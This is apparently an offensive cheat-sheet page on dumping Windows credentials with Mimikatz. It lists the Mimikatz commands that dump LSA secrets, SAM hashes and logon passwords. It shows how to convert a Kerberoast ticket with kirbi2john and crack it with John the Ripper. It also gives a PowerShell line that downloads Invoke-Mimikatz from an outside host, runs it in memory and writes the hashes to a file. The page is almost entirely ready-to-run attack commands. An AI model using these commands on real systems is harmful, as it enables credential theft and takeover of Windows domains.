>_ shadow.red
notatki-hakera.pl YouTube CTF Solutions Channel ☕ Buy me a coffee
~ / Active Directory / Mimikatz - Credential Dumps

Mimikatz - Credential Dumps

Active Directory AD Attacks windows

Standard sequence

privilege::debug
token::elevate
lsadump::lsa /patch
lsadump::sam
sekurlsa::logonpasswords

Convert kirbi to crackable hash (Kerberoast)

python3 kirbi2john.py 3-40a10000-xor-app59\$@MSSQLSvc\~xor-app23.xor.com\~1433-XOR.COM.kirbi -o MSSQLSvc.txt
john MSSQLSvc.txt --wordlist=/usr/share/wordlists/rockyou.txt

Inline PowerShell dump (Invoke-Mimikatz)

IEX (New-Object System.Net.Webclient).DownloadString('http://172.16.242.173/Invoke-Mimikatz.ps1')
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::sam" "exit"' > hashes.txt